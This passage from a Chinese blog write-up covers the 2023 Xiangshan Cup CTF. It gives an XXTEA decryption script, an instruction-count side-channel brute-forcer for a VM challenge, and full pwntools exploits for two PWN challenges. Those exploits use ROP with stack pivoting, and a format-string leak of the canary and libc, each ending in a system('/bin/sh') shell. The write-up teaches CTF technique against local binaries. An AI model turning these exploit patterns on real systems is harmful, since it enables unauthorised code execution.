class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> binascii<br><span class="hljs-keyword">import</span> struct<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">MX</span>(<span class="hljs-params">z, y, total, key, p, e</span>):<br>    temp1 = (z.value &gt;&gt; <span class="hljs-number">5</span> ^ y.value &lt;&lt; <span class="hljs-number">2</span>) + (y.value &gt;&gt; <span class="hljs-number">3</span> ^ z.value &lt;&lt; <span class="hljs-number">4</span>)<br>    temp2 = (total.value ^ y.value) + (key[(p &amp; <span class="hljs-number">3</span>) ^ e.value] ^ z.value)<br><br>    <span class="hljs-keyword">return</span> c_uint32(temp1 ^ temp2)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">encrypt</span>(<span class="hljs-params">n, v, key</span>):<br>    delta = <span class="hljs-number">0x9e3779b9</span><br>    rounds = <span class="hljs-number">6</span> + <span class="hljs-number">52</span> // n<br><br>    total = c_uint32(<span class="hljs-number">0</span>)<br>    z = c_uint32(v[n - <span class="hljs-number">1</span>])<br>    e = c_uint32(<span class="hljs-number">0</span>)<br><br>    <span class="hljs-keyword">while</span> rounds &gt; <span class="hljs-number">0</span>:<br>        total.value += delta<br>        e.value = (total.value &gt;&gt; <span class="hljs-number">2</span>) &amp; <span class="hljs-number">3</span><br>        <span class="hljs-keyword">for</span> p <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(n - <span class="hljs-number">1</span>):<br>            y = c_uint32(v[p + <span class="hljs-number">1</span>])<br>            v[p] = c_uint32(v[p] + MX(z, y, total, key, p, e).value).value<br>            z.value = v[p]<br>        y = c_uint32(v[<span class="hljs-number">0</span>])<br>        v[n - <span class="hljs-number">1</span>] = c_uint32(v[n - <span class="hljs-number">1</span>] + MX(z, y, total, key, n - <span class="hljs-number">1</span>, e).value).value<br>        z.value = v[n - <span class="hljs-number">1</span>]<br>        rounds -= <span class="hljs-number">1</span><br><br>    <span class="hljs-keyword">return</span> v<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">decrypt</span>(<span class="hljs-params">n, v, key</span>):<br>    delta = <span class="hljs-number">0x9e3779b9</span><br>    rounds = <span class="hljs-number">6</span> + <span class="hljs-number">52</span> // n<br><br>    total = c_uint32(rounds * delta)<br>    y = c_uint32(v[<span class="hljs-number">0</span>])<br>    e = c_uint32(<span class="hljs-number">0</span>)<br><br>    <span class="hljs-keyword">while</span> rounds &gt; <span class="hljs-number">0</span>:<br>        e.value = (total.value &gt;&gt; <span class="hljs-number">2</span>) &amp; <span class="hljs-number">3</span><br>        <span class="hljs-keyword">for</span> p <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(n - <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, -<span class="hljs-number">1</span>):<br>            z = c_uint32(v[p - <span class="hljs-number">1</span>])<br>            v[p] = c_uint32((v[p] - MX(z, y, total, key, p, e).value)).value<br>            y.value = v[p]<br>        z = c_uint32(v[n - <span class="hljs-number">1</span>])<br>        v[<span class="hljs-number">0</span>] = c_uint32(v[<span class="hljs-number">0</span>] - MX(z, y, total, key, <span class="hljs-number">0</span>, e).value).value<br>        y.value = v[<span class="hljs-number">0</span>]<br>        total.value -= delta<br>        rounds -= <span class="hljs-number">1</span><br><br>    <span class="hljs-keyword">return</span> v<br><br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    k = [<span class="hljs-number">12345678</span> ,<span class="hljs-number">12398712</span> ,<span class="hljs-number">91283904</span> ,<span class="hljs-number">12378192</span> ]<br>    n = <span class="hljs-number">9</span><br>    res = [<span class="hljs-number">689085350</span> ,<span class="hljs-number">626885696</span> ,<span class="hljs-number">1894439255</span> ,<span class="hljs-number">1204672445</span> ,<span class="hljs-number">1869189675</span> ,<span class="hljs-number">475967424</span> ,<span class="hljs-number">1932042439</span> ,<span class="hljs-number">1280104741</span> ,<span class="hljs-number">2808893494</span> ]<br>    res = decrypt(n, res, k)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Decrypted data is : &quot;</span>, <span class="hljs-built_in">hex</span>(res[<span class="hljs-number">0</span>]), <span class="hljs-built_in">hex</span>(res[<span class="hljs-number">1</span>]), <span class="hljs-built_in">hex</span>(res[<span class="hljs-number">2</span>]), <span class="hljs-built_in">hex</span>(res[<span class="hljs-number">3</span>]), <span class="hljs-built_in">hex</span>(res[<span class="hljs-number">4</span>]), <span class="hljs-built_in">hex</span>(res[<span class="hljs-number">5</span>]), <span class="hljs-built_in">hex</span>(res[<span class="hljs-number">6</span>]), <span class="hljs-built_in">hex</span>(res[<span class="hljs-number">7</span>]), <span class="hljs-built_in">hex</span>(res[<span class="hljs-number">8</span>]))<br>    v1 = [<span class="hljs-string">b&#x27;\x38\x66\x31\x63&#x27;</span>, <span class="hljs-string">b&#x27;\x36\x65\x63\x61&#x27;</span>, <span class="hljs-string">b&#x27;\x34\x62\x34\x2d&#x27;</span>, <span class="hljs-string">b&#x27;\x39\x34\x2d\x36&#x27;</span>, <span class="hljs-string">b&#x27;\x62\x2d\x31\x33&#x27;</span>, <span class="hljs-string">b&#x27;\x2d\x62\x35\x32&#x27;</span>, <span class="hljs-string">b&#x27;\x31\x30\x31\x61&#x27;</span>, <span class="hljs-string">b&#x27;\x39\x38\x61\x30&#x27;</span>, <span class="hljs-string">b&#x27;\x32\x39\x35\x63&#x27;</span>]<br>    v2 = []  <br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> v1:  <br>        v2.append(struct.unpack(<span class="hljs-string">&quot;&lt;I&quot;</span>, i)[<span class="hljs-number">0</span>])<br>    <span class="hljs-built_in">print</span>(v2)<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">9</span>):<br>        <span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(v2[i]),end=<span class="hljs-string">&#x27; &#x27;</span>)<br>  <span class="hljs-comment">#63316638616365362d346234362d343933312d623235622d613130313061383963353932</span><br>    asc = <span class="hljs-string">&#x27;63316638616365362d346234362d343933312d623235622d613130313061383963353932&#x27;</span><br>    <span class="hljs-built_in">str</span> = binascii.unhexlify(asc)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-built_in">str</span>)<br></code></pre></td></tr></table></figure>

<h2 id="nesting"><a href="#nesting" class="headerlink" title="nesting"></a>nesting</h2><p>虚拟机逆向</p>
<p>vm题的一些思路</p>
<p>1.还原结构体和switch跳表，读懂vm代码，写代码将opcode转化成汇编指令语句然后再逆向汇编代码，这种方法效率最低，做一题需要很久，像这次比赛两个小时肯定不够，除非做到过类似的。</p>
<p>2.软件分析工具和脚本。</p>
<p>3.爆破。主要用于程序对flag(input)的检测是逐位的情况下，每一位的对错都会导致执行流的改变，执行时间或执行指令数量相差巨大，这样就能进行侧信道逐位爆破。战队里大佬用侧信道的方式爆破出来了，学习一下。</p>
<p>首先来逆向代码</p>
<p><img src="/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231019214727.png" srcset="/img/loading.gif" lazyload alt="QQ截图20231019214727"></p>
<p><img src="/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231019214759.png" srcset="/img/loading.gif" lazyload alt="QQ截图20231019214759"></p>
<p>run_vm中的代码比较混乱，主要原因是将a1识别成了数组，并将swtich语句识别成了if-else语句，需要创建结构体对a1进行重定义并恢复switch跳表</p>
<p>tips:ida7.7及以上可以识别出switch语句，不需要手动恢复</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/hgy413/article/details/7104304">ida创建结构体参考</a>       <a target="_blank" rel="noopener" href="https://blog.csdn.net/huzai9527/article/details/121204850">ida修复switch跳表参考</a></p>
<p>跳表修复时Default jump address不设定好的话，会出现多余的case</p>
<p>结构体创建完后将run_vm函数的指向opcode的参数定义成刚刚创建的结构体(选中,右键, Convert to struct)</p>
<p>修复前</p>
<img src="/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ截图20231019222157.png" srcset="/img/loading.gif" lazyload alt="QQ截图20231019222157" style="zoom:50%;">

<p>修复后</p>
<p><img src="/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231019223303-1697726007256.png" srcset="/img/loading.gif" lazyload alt="QQ截图20231019223303"></p>
<p>现在代码就比较美观了，但是虚拟机的逻辑还是很复杂,所以不逆了</p>
<p>程序运行后会让你输入flag并检测flag是否正确</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css"><span class="hljs-selector-tag">Input</span> your flag:<br></code></pre></td></tr></table></figure>

<p>这里用sde来统计程序运行到的指令数量，结果会在命令行以ICOUNT: 3421916的形式输出，这也方便爆破脚本的编写</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">sde -icount -- ./nesting<br></code></pre></td></tr></table></figure>

<p>可以发现每多输入一位，总指令数都会增加20万左右</p>
<p>flag的前4位必定是”flag”，分别输入”1111”,”f111”，”fl11”，”fla1”，”flag”可以发现在位数相同的情况下，flag每正确一位总指令数会增加55000左右，说明flag是逐位check的，并且不同结果的执行流长度相差较大，可以通过这一点来爆破flag</p>
<p>爆破脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span>*<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">run</span>(<span class="hljs-params"><span class="hljs-built_in">str</span></span>):<br>	p = process([<span class="hljs-string">&#x27;sde64&#x27;</span>,<span class="hljs-string">&#x27;-icount&#x27;</span>,<span class="hljs-string">&#x27;--&#x27;</span>,<span class="hljs-string">&#x27;./nesting&#x27;</span>])<br>	p.recvuntil(<span class="hljs-string">&#x27;Input your flag:&#x27;</span>)<br>	p.sendline(<span class="hljs-built_in">str</span>)<br>	p.recvuntil(<span class="hljs-string">&#x27;ICOUNT:&#x27;</span>)<br>	icount = <span class="hljs-built_in">int</span>(p.recvline())<br>	p.close()<br>	<span class="hljs-keyword">return</span> icount<br><br>table = <span class="hljs-string">&#x27;0123456789abcdef-&#125;&#x27;</span><br><span class="hljs-comment">#table = string.printable</span><br>flag = <span class="hljs-string">&#x27;flag&#123;&#x27;</span><br><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>	t1 = run(flag+<span class="hljs-string">&#x27;#&#x27;</span>)<br>	ok = <span class="hljs-number">0</span><br>	<span class="hljs-keyword">for</span> ch <span class="hljs-keyword">in</span> table:<br>		t2 = run(flag+ch)<br>		<span class="hljs-keyword">if</span>(t2-t1&gt;<span class="hljs-number">50000</span>):<br>			flag = flag + ch<br>			ok = <span class="hljs-number">1</span><br>			<span class="hljs-built_in">print</span>(flag)<br>			<span class="hljs-keyword">break</span><br>	<span class="hljs-keyword">if</span>(ok==<span class="hljs-number">0</span>):<br>		<span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;result : &#x27;</span>+flag)<br>		exit()<br><span class="hljs-comment">#flag&#123;2c7c093b-f648-11ed-a716-701ab8caaafe&#125;</span><br></code></pre></td></tr></table></figure>



<h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="move"><a href="#move" class="headerlink" title="move"></a>move</h2><p>main函数</p>
<p><img src="/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231029232915.png" srcset="/img/loading.gif" lazyload alt="QQ截图20231029232915"></p>
<p>vuln函数</p>
<p><img src="/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231029232947.png" srcset="/img/loading.gif" lazyload alt="QQ截图20231029232947"></p>
<p>先读取0x20的数据到bss段，再读取4字节数据，等于0x12345678的话vuln函数中可以栈溢出0x10字节，可以覆盖rbp和返回地址</p>
<p>思路是栈迁移到bss段，跳转到vuln中的read函数，向bss中的rbp-0x30处读入0x40的数据,不断重复构造。</p>
<p>注意第二次和第三次执行vuln中的read函数时ROP是在read函数中进行的，read函数本身没有push rbp和leave，只有ret，利用read中的ret返回到bss中的p64(rbp_ret) + p64(bss_addr-0x30-8) + p64(leave_ret)来反复在bss段进行ROP。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span>* <br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span>*<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>, arch=<span class="hljs-string">&quot;amd64&quot;</span>)<br><br>elf = ELF(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><br>io = process(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">debug</span>():<br>    gdb.attach(io,<span class="hljs-string">&#x27;b main&#x27;</span>)<br>    sleep(<span class="hljs-number">1</span>)<br>rbp_ret = <span class="hljs-number">0x401262</span><br>  <br>rdi_ret = <span class="hljs-number">0x401353</span><br><br>puts_got = <span class="hljs-number">0x404018</span><br><br>puts_plt = <span class="hljs-number">0x401080</span><br><br>bss_addr = <span class="hljs-number">0x4050A0</span><br><br>leave_ret = <span class="hljs-number">0x4012E0</span><br><br>vuln_read = <span class="hljs-number">0x401230</span> <br><br>io.recvuntil(<span class="hljs-string">&#x27;lets travel again!&#x27;</span>)<br>bss1 = p64(bss_addr) + p64(vuln_read)<br>io.send(bss1)<br><br>io.recvuntil(<span class="hljs-string">&#x27;Input your setp number&#x27;</span>)<br>io.send(<span class="hljs-string">b&#x27;\x78\x56\x34\x12&#x27;</span>)<br><br><span class="hljs-comment">#debug()</span><br><br>io.recvuntil(<span class="hljs-string">&#x27;TaiCooLa&#x27;</span>)<br>payload1 = <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x30</span> + p64(bss_addr) + p64(leave_ret)<br>io.send(payload1)<br><br>sleep(<span class="hljs-number">0.5</span>)<br>bss2 = p64(rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(rbp_ret) + p64(bss_addr) + p64(vuln_read) + p64(bss_addr-<span class="hljs-number">0x30</span>-<span class="hljs-number">8</span>) + p64(leave_ret)<br>io.send(bss2)<br><br>puts_addr = u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br><br>success(<span class="hljs-string">&#x27;puts_addr = &#x27;</span> + <span class="hljs-built_in">hex</span>(puts_addr))<br><br>libc = LibcSearcher(<span class="hljs-string">&#x27;puts&#x27;</span>,puts_addr)<br><br>libc_base = puts_addr - libc.dump(<span class="hljs-string">&#x27;puts&#x27;</span>)<br><br>success(<span class="hljs-string">&#x27;libc_base = &#x27;</span> + <span class="hljs-built_in">hex</span>(libc_base))<br><br>system_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br><br>binsh = libc_base + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br><br>sleep(<span class="hljs-number">0.5</span>)<br>payload2 = p64(rdi_ret) + p64(binsh) + p64(system_addr) +  p64(<span class="hljs-number">0</span>) + p64(<span class="hljs-number">0</span>) + p64(rbp_ret) + p64(bss_addr-<span class="hljs-number">0x30</span>-<span class="hljs-number">8</span>) + p64(leave_ret)<br>io.send(payload2)<br><br>io.interactive()<br></code></pre></td></tr></table></figure>



<h2 id="pwthon"><a href="#pwthon" class="headerlink" title="pwthon"></a>pwthon</h2><p>本地运行条件：</p>
<ul>
<li><p>python3.7并安装numpy库，<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_51116518/article/details/130184514">Ubuntu 下载并切换Python默认版本（无痛顺畅版）</a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">#</span><span class="language-bash">查看并切换python版本</span><br>sudo update-alternatives --config python<br></code></pre></td></tr></table></figure>
</li>
<li><p>创建.&#x2F;tmp文件夹</p>
</li>
<li><p>在import app前添加</p>
</li>
</ul>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stata">sys.path.<span class="hljs-keyword">append</span>(&#x27;path_to/<span class="hljs-keyword">app</span>.cpython-37m-x86_64-linux-gnu.<span class="hljs-keyword">so</span>&#x27;)<br></code></pre></td></tr></table></figure>

<p>查看保护</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">$ </span><span class="language-bash">checksec app.cpython-37m-x86_64-linux-gnu.so</span>  <br>  Arch:     amd64-64-little<br>    RELRO:    Partial RELRO<br>    Stack:    Canary found<br>    NX:       NX enabled<br>    PIE:      PIE enabled<br>    RPATH:    &#x27;/home/xiran/anaconda3/envs/cython/lib&#x27;<br></code></pre></td></tr></table></figure>



<p>打开ida，通过查看字符串交叉引用找到Welcome2Pwnthon函数</p>
<p>发现泄露了app_so库中__pyx_f_3app_get_info函数的地址，第一次read后有格式化字符串漏洞，第二次read存在栈溢出。</p>
<p><img src="/2023/10/18/2023%E9%A6%99%E5%B1%B1%E6%9D%AFwp/QQ%E6%88%AA%E5%9B%BE20231031125959.png" srcset="/img/loading.gif" lazyload alt="QQ截图20231031125959"></p>
<p>用gdb调试，在栈上找到了open64函数，并且在canary之前，那么一次格式化字符串可以泄露libc+canary</p>
<p>exp，ubuntu2004本机打通了，其它环境可能open64和canary的偏移要修改</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span>*<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span>*<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>,arch=<span class="hljs-string">&#x27;amd64&#x27;</span>)<br><br>io = process([<span class="hljs-string">&#x27;python3.7&#x27;</span>,<span class="hljs-string">&#x27;main.py&#x27;</span>])<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">debug</span>():<br>	gdb.attach(io,<span class="hljs-string">&#x27;b _pyx_f_3app_Welcome2Pwnthon&#x27;</span>)<br>	sleep(<span class="hljs-number">1</span>)<br>io.sendline(<span class="hljs-string">&#x27;0&#x27;</span>)<br>io.recvuntil(<span class="hljs-string">&#x27;Give you a gift &#x27;</span>)<br>app_info = <span class="hljs-built_in">int</span>(io.recv(),<span class="hljs-number">16</span>)<br>success(<span class="hljs-string">&#x27;app_info = &#x27;</span> + <span class="hljs-built_in">hex</span>(app_info))<br>app_base = app_info - <span class="hljs-number">0x68b0</span><br>success(<span class="hljs-string">&#x27;app_base = &#x27;</span> + <span class="hljs-built_in">hex</span>(app_base))<br><br><span class="hljs-comment">#debug()</span><br>io.sendline(<span class="hljs-string">&#x27;%p-&#x27;</span>*<span class="hljs-number">35</span>)<br>datas = io.readline().decode().split(<span class="hljs-string">&quot;-&quot;</span>)<br>open64_addr = <span class="hljs-built_in">int</span>(datas[<span class="hljs-number">23</span>],<span class="hljs-number">16</span>)-<span class="hljs-number">232</span><br>canary = <span class="hljs-built_in">int</span>(datas[<span class="hljs-number">29</span>],<span class="hljs-number">16</span>)<br><br>libc = LibcSearcher(<span class="hljs-string">&#x27;open64&#x27;</span>,open64_addr)<br>libc_base = open64_addr - libc.dump(<span class="hljs-string">&#x27;open64&#x27;</span>)<br>success(<span class="hljs-string">&#x27;libc_base = &#x27;</span> + <span class="hljs-built_in">hex</span>(libc_base))<br>system_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br>binsh_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br>rdi_ret = app_base + <span class="hljs-number">0x3f8f</span><br>ret = app_base + <span class="hljs-number">0x301a</span><br><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x108</span> + p64(canary) + p64(<span class="hljs-number">0</span>) + p64(ret) + p64(rdi_ret) + p64(binsh_addr) + p64(system_addr)<br>io.sendline(payload)<br><br>io.interactive()<br></code></pre></td></tr></table></figure>



<h2 id="reference"><a href="#reference" class="headerlink" title="reference"></a>reference</h2><p><a target="_blank" rel="noopener" href="https://blog.xmcve.com/2023/10/16/%E9%A6%99%E5%B1%B1%E6%9D%AF2023-Writeup/">星盟2023香山杯2023香山杯wp</a></p>
<p>ArrestYou香山杯2023香山杯wp，公众号山海之关</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="../../../../categories/writeup/" class="category-chain-item">writeup</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="../../../../tags/writeup/">#writeup</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>2023香山杯RE&amp;PWN writeup</div>
      <div>https://lkliki.github.io/2023/10/18/2023香山杯wp/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>0P1N</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年10月18日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="../../../05/18/unlink/" title="unlink">
                        <span class="hidden-mobile">unlink</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href=""><span>fffer</span></a> <i class="iconfont icon-bug"></i> <a href="" target="_blank" rel="nofollow noopener"><span>0p1n</span></a> <br /> <a href=""><span>富强 民主 文明 和谐 自由 平等 公正 法治 爱国 敬业 诚信 友善</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="../../../../js/events.js" ></script>
<script  src="../../../../js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="../../../../js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

